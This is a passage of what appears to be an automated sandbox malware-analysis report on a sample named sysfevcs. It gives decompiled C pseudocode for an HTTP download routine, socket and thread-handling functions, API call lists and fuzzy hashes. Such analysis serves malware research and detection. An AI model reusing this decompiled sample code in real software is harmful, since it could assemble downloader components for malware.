                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0040E9A4), ref: 0040DF04
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0040E9A4), ref: 0040DF0A
                                                                                                                                                                                                                                                                  • WSACloseEvent.WS2_32(?), ref: 0040DF10
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040E9A4), ref: 0040DF26
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                                                                                  • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                  • API String ID: 2403999931-3762367603
                                                                                                                                                                                                                                                                  • Opcode ID: a36a4f69a5f65fca997c73850381b322855aafbb0899d8bfa6d7518ee6653b63
                                                                                                                                                                                                                                                                  • Instruction ID: 73f0472627ba8a888b827b8634c70e373476b8db8a351e124d448d94f7e1e702
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a36a4f69a5f65fca997c73850381b322855aafbb0899d8bfa6d7518ee6653b63
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 663185B1900B05ABD720EFB5D948B57B7A8BF18710F048539E55AB7681C738F858CBD8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040BF80(char* _a4, char** _a8) {
                                                                                                                                                                                                                                                                  				char _v260;
                                                                                                                                                                                                                                                                  				char _v772;
                                                                                                                                                                                                                                                                  				long _v776;
                                                                                                                                                                                                                                                                  				void* _v780;
                                                                                                                                                                                                                                                                  				intOrPtr _v792;
                                                                                                                                                                                                                                                                  				char* _v796;
                                                                                                                                                                                                                                                                  				signed short _v816;
                                                                                                                                                                                                                                                                  				intOrPtr _v820;
                                                                                                                                                                                                                                                                  				char* _v824;
                                                                                                                                                                                                                                                                  				void _v836;
                                                                                                                                                                                                                                                                  				void* _v840;
                                                                                                                                                                                                                                                                  				void* _v844;
                                                                                                                                                                                                                                                                  				void* _v848;
                                                                                                                                                                                                                                                                  				char* _v852;
                                                                                                                                                                                                                                                                  				void _v1876;
                                                                                                                                                                                                                                                                  				long _v1880;
                                                                                                                                                                                                                                                                  				void* _t91;
                                                                                                                                                                                                                                                                  				void* _t92;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v776 = 0;
                                                                                                                                                                                                                                                                  				_v840 = 0;
                                                                                                                                                                                                                                                                  				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                  				_t92 = _t91 + 0xc;
                                                                                                                                                                                                                                                                  				_v840 = 0x3c;
                                                                                                                                                                                                                                                                  				_v824 =  &_v260;
                                                                                                                                                                                                                                                                  				_v820 = 0x100;
                                                                                                                                                                                                                                                                  				_v796 =  &_v772;
                                                                                                                                                                                                                                                                  				_v792 = 0x200;
                                                                                                                                                                                                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                  				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v780 != 0) {
                                                                                                                                                                                                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v844 != 0) {
                                                                                                                                                                                                                                                                  						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v848 != 0) {
                                                                                                                                                                                                                                                                  							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                                                                                                                                                                                                  								if(_a8 == 0) {
                                                                                                                                                                                                                                                                  									_v776 = 1;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_v852 = 0;
                                                                                                                                                                                                                                                                  									while(1 != 0) {
                                                                                                                                                                                                                                                                  										_t87 = _v848;
                                                                                                                                                                                                                                                                  										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                                                                                                                                                                                                  											_v776 = E00408880(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                                                                                                                                                                                                  											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                                                                                                                                                                                                  											_t92 = _t92 + 0x14;
                                                                                                                                                                                                                                                                  											_v852 =  &(_v852[_v1880]);
                                                                                                                                                                                                                                                                  											continue;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									 *_a8 = _v852;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v776;
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x0040bf89
                                                                                                                                                                                                                                                                  0x0040bf93
                                                                                                                                                                                                                                                                  0x0040bfa8
                                                                                                                                                                                                                                                                  0x0040bfad
                                                                                                                                                                                                                                                                  0x0040bfb0
                                                                                                                                                                                                                                                                  0x0040bfc0
                                                                                                                                                                                                                                                                  0x0040bfc6
                                                                                                                                                                                                                                                                  0x0040bfd6
                                                                                                                                                                                                                                                                  0x0040bfdc
                                                                                                                                                                                                                                                                  0x0040bff8
                                                                                                                                                                                                                                                                  0x0040c00e
                                                                                                                                                                                                                                                                  0x0040c01b
                                                                                                                                                                                                                                                                  0x0040c047
                                                                                                                                                                                                                                                                  0x0040c054
                                                                                                                                                                                                                                                                  0x0040c07d
                                                                                                                                                                                                                                                                  0x0040c08a
                                                                                                                                                                                                                                                                  0x0040c0a7
                                                                                                                                                                                                                                                                  0x0040c0b1
                                                                                                                                                                                                                                                                  0x0040c166
                                                                                                                                                                                                                                                                  0x0040c0b7
                                                                                                                                                                                                                                                                  0x0040c0b7
                                                                                                                                                                                                                                                                  0x0040c0c1
                                                                                                                                                                                                                                                                  0x0040c0e1
                                                                                                                                                                                                                                                                  0x0040c0f0
                                                                                                                                                                                                                                                                  0x0040c119
                                                                                                                                                                                                                                                                  0x0040c13a
                                                                                                                                                                                                                                                                  0x0040c13f
                                                                                                                                                                                                                                                                  0x0040c14e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c14e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c0f0
                                                                                                                                                                                                                                                                  0x0040c162
                                                                                                                                                                                                                                                                  0x0040c162
                                                                                                                                                                                                                                                                  0x0040c0b1
                                                                                                                                                                                                                                                                  0x0040c177
                                                                                                                                                                                                                                                                  0x0040c177
                                                                                                                                                                                                                                                                  0x0040c184
                                                                                                                                                                                                                                                                  0x0040c184
                                                                                                                                                                                                                                                                  0x0040c191
                                                                                                                                                                                                                                                                  0x0040c191
                                                                                                                                                                                                                                                                  0x0040c1a0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.NTDLL ref: 0040BFA8
                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(0040CD99,00000000,10000000,0000003C), ref: 0040BFF8
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C008
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C041
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C077
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C09F
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C0E8
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040C13A
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C177
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C184
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C191
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                                                                                  • String ID: <$GET
                                                                                                                                                                                                                                                                  • API String ID: 1205665004-427699995
                                                                                                                                                                                                                                                                  • Opcode ID: e434d94a767447e33f86dc89c6ee3707e4ccc101af4a559bb0826e734c245523
                                                                                                                                                                                                                                                                  • Instruction ID: e4e2bc4ae20f5a24e0f583b0843f83e65f824e6296bed8a186bd164e60841b18
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e434d94a767447e33f86dc89c6ee3707e4ccc101af4a559bb0826e734c245523
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7514C75901228DBDB36CB50CD94BD973B8AB08705F1041E9A60DBA2C1D7B96FC8CF54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                                                                                                                  			E0040B9B0(LONG* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                  				int _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				LONG* _v16;
                                                                                                                                                                                                                                                                  				signed char _v17;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                                                                                                                  				signed int _t57;
                                                                                                                                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                                                                                                                                                                                                  				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = _a4;
                                                                                                                                                                                                                                                                  					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                                                                                                                                                                                                  						_v17 = 0 | _a8 != 0xffffffff;
                                                                                                                                                                                                                                                                  						while(1 != 0) {
                                                                                                                                                                                                                                                                  							_v24 = 0;
                                                                                                                                                                                                                                                                  							EnterCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                  							_v28 = 0;
                                                                                                                                                                                                                                                                  							while(_v28 <  *_v16) {
                                                                                                                                                                                                                                                                  								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                                                                                                                                                                                                  									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                                                                                                                                                                                                  									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  									_v24 =  ~_t57 + 1 + _v24;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							LeaveCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                  							if(_v24 !=  *_v16) {
                                                                                                                                                                                                                                                                  								if((_v17 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  									L15:
                                                                                                                                                                                                                                                                  									Sleep(1);
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_t80 = _a8 - 1;
                                                                                                                                                                                                                                                                  									_a8 = _t80;
                                                                                                                                                                                                                                                                  									if(_t80 != 0) {
                                                                                                                                                                                                                                                                  										goto L15;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v12 = 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L16;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L16:
                                                                                                                                                                                                                                                                  				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x0040b9c3
                                                                                                                                                                                                                                                                  0x0040b9cf
                                                                                                                                                                                                                                                                  0x0040b9d5
                                                                                                                                                                                                                                                                  0x0040b9e0
                                                                                                                                                                                                                                                                  0x0040b9e9
                                                                                                                                                                                                                                                                  0x0040b9fa
                                                                                                                                                                                                                                                                  0x0040ba09
                                                                                                                                                                                                                                                                  0x0040ba0c
                                                                                                                                                                                                                                                                  0x0040ba19
                                                                                                                                                                                                                                                                  0x0040ba27
                                                                                                                                                                                                                                                                  0x0040ba2d
                                                                                                                                                                                                                                                                  0x0040ba3f
                                                                                                                                                                                                                                                                  0x0040ba56
                                                                                                                                                                                                                                                                  0x0040ba72
                                                                                                                                                                                                                                                                  0x0040ba7a
                                                                                                                                                                                                                                                                  0x0040ba82
                                                                                                                                                                                                                                                                  0x0040ba58
                                                                                                                                                                                                                                                                  0x0040ba5e
                                                                                                                                                                                                                                                                  0x0040ba5e
                                                                                                                                                                                                                                                                  0x0040ba3c
                                                                                                                                                                                                                                                                  0x0040ba3c
                                                                                                                                                                                                                                                                  0x0040ba8e
                                                                                                                                                                                                                                                                  0x0040ba9c
                                                                                                                                                                                                                                                                  0x0040baad
                                                                                                                                                                                                                                                                  0x0040babc
                                                                                                                                                                                                                                                                  0x0040babe
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040baaf
                                                                                                                                                                                                                                                                  0x0040bab2
                                                                                                                                                                                                                                                                  0x0040bab5
                                                                                                                                                                                                                                                                  0x0040bab8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040baba
                                                                                                                                                                                                                                                                  0x0040bab8
                                                                                                                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ba9c
                                                                                                                                                                                                                                                                  0x0040ba0c
                                                                                                                                                                                                                                                                  0x0040b9fa
                                                                                                                                                                                                                                                                  0x0040bac9
                                                                                                                                                                                                                                                                  0x0040bad4
                                                                                                                                                                                                                                                                  0x0040bae0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0040B9B6
                                                                                                                                                                                                                                                                  • GetThreadPriority.KERNEL32(00000000,?,0040DEEE,?,000000FF,?,0040E9A4), ref: 0040B9BD
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0040B9C8
                                                                                                                                                                                                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040DEEE,?,000000FF,?,0040E9A4), ref: 0040B9CF
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040B9F2
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000FB), ref: 0040BA27
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040BA72
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040BA8E
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 0040BABE
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0040BACD
                                                                                                                                                                                                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040DEEE,?,000000FF), ref: 0040BAD4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3862671961-0
                                                                                                                                                                                                                                                                  • Opcode ID: e02cfc6e931c3f5b5f27e624d3331d9921decd7a09dd22ec20462e0f7b40d9ad
                                                                                                                                                                                                                                                                  • Instruction ID: 60dba0ed44522af60a36c0c27669d54f94d2e7ae5eee10216e3926d5ce6a7601
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e02cfc6e931c3f5b5f27e624d3331d9921decd7a09dd22ec20462e0f7b40d9ad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23410AB4A00209EBDB14CFA4C948BAEBB75EF44315F10817AE911B7781D7389A45CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E0040E560(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                                                                                                                                                                                                  				long _v4;
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				char _v28;
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				intOrPtr _t59;
                                                                                                                                                                                                                                                                  				intOrPtr _t64;
                                                                                                                                                                                                                                                                  				void* _t73;
                                                                                                                                                                                                                                                                  				void* _t106;
                                                                                                                                                                                                                                                                  				void* _t108;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t108 = __eax;
                                                                                                                                                                                                                                                                  				_t106 = __ecx;
                                                                                                                                                                                                                                                                  				if(_a4 != 0 || __ebx == 0) {
                                                                                                                                                                                                                                                                  					InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                  					_a4 = 1;
                                                                                                                                                                                                                                                                  					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                                                                                                                                                                                                  					 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                  					_a6 = 0;
                                                                                                                                                                                                                                                                  					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                                                                                                                                                                                                  					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                  					return _t59;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				InterlockedExchange(_t106 + 4, E0040BB80());
                                                                                                                                                                                                                                                                  				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                                                                                                                                                                                                  				if(_t64 == 0) {
                                                                                                                                                                                                                                                                  					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                                                                                                                                                                                                  							InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                  							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                                                                                                                                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                  							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                                                                                                                                                                                                  							return E0040DF40(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                                                                                                                                                                                                  							_push(_t106);
                                                                                                                                                                                                                                                                  							return E0040E2E0(_t108);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						return InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t73 = _t64 - 1;
                                                                                                                                                                                                                                                                  					if(_t73 != 0) {
                                                                                                                                                                                                                                                                  						L14:
                                                                                                                                                                                                                                                                  						return _t73;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                                                                                                                                                                                                  							InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                  							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                                                                                                                                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                  							_v8 = _t106 + 8;
                                                                                                                                                                                                                                                                  							_v4 = __ebx;
                                                                                                                                                                                                                                                                  							E0040DF40(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                  							_t73 = E0040E4F0(_t106);
                                                                                                                                                                                                                                                                  							if(_t73 != 0) {
                                                                                                                                                                                                                                                                  								goto L14;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                  								return _t73;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							return InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}
















                                                                                                                                                                                                                                                                  0x0040e56a
                                                                                                                                                                                                                                                                  0x0040e56c
                                                                                                                                                                                                                                                                  0x0040e56e
                                                                                                                                                                                                                                                                  0x0040e6f6
                                                                                                                                                                                                                                                                  0x0040e70d
                                                                                                                                                                                                                                                                  0x0040e712
                                                                                                                                                                                                                                                                  0x0040e720
                                                                                                                                                                                                                                                                  0x0040e727
                                                                                                                                                                                                                                                                  0x0040e72c
                                                                                                                                                                                                                                                                  0x0040e739
                                                                                                                                                                                                                                                                  0x0040e73f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e73f
                                                                                                                                                                                                                                                                  0x0040e586
                                                                                                                                                                                                                                                                  0x0040e58f
                                                                                                                                                                                                                                                                  0x0040e592
                                                                                                                                                                                                                                                                  0x0040e655
                                                                                                                                                                                                                                                                  0x0040e667
                                                                                                                                                                                                                                                                  0x0040e670
                                                                                                                                                                                                                                                                  0x0040e68b
                                                                                                                                                                                                                                                                  0x0040e6a3
                                                                                                                                                                                                                                                                  0x0040e6ad
                                                                                                                                                                                                                                                                  0x0040e6b4
                                                                                                                                                                                                                                                                  0x0040e6b8
                                                                                                                                                                                                                                                                  0x0040e6c2
                                                                                                                                                                                                                                                                  0x0040e6d1
                                                                                                                                                                                                                                                                  0x0040e6e0
                                                                                                                                                                                                                                                                  0x0040e6f1
                                                                                                                                                                                                                                                                  0x0040e672
                                                                                                                                                                                                                                                                  0x0040e672
                                                                                                                                                                                                                                                                  0x0040e675
                                                                                                                                                                                                                                                                  0x0040e678
                                                                                                                                                                                                                                                                  0x0040e686
                                                                                                                                                                                                                                                                  0x0040e686
                                                                                                                                                                                                                                                                  0x0040e657
                                                                                                                                                                                                                                                                  0x0040e666
                                                                                                                                                                                                                                                                  0x0040e666
                                                                                                                                                                                                                                                                  0x0040e598
                                                                                                                                                                                                                                                                  0x0040e598
                                                                                                                                                                                                                                                                  0x0040e59b
                                                                                                                                                                                                                                                                  0x0040e74e
                                                                                                                                                                                                                                                                  0x0040e74e
                                                                                                                                                                                                                                                                  0x0040e5a1
                                                                                                                                                                                                                                                                  0x0040e5a7
                                                                                                                                                                                                                                                                  0x0040e5c3
                                                                                                                                                                                                                                                                  0x0040e5d4
                                                                                                                                                                                                                                                                  0x0040e5ec
                                                                                                                                                                                                                                                                  0x0040e5f6
                                                                                                                                                                                                                                                                  0x0040e600
                                                                                                                                                                                                                                                                  0x0040e604
                                                                                                                                                                                                                                                                  0x0040e608
                                                                                                                                                                                                                                                                  0x0040e61a
                                                                                                                                                                                                                                                                  0x0040e626
                                                                                                                                                                                                                                                                  0x0040e62a
                                                                                                                                                                                                                                                                  0x0040e634
                                                                                                                                                                                                                                                                  0x0040e63b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e641
                                                                                                                                                                                                                                                                  0x0040e641
                                                                                                                                                                                                                                                                  0x0040e64d
                                                                                                                                                                                                                                                                  0x0040e64d
                                                                                                                                                                                                                                                                  0x0040e5a9
                                                                                                                                                                                                                                                                  0x0040e5bb
                                                                                                                                                                                                                                                                  0x0040e5bb
                                                                                                                                                                                                                                                                  0x0040e5a7
                                                                                                                                                                                                                                                                  0x0040e59b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0040E586
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E5B0
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E5C3
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040E5D4
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E65B
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E6F6
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32 ref: 0040E72C
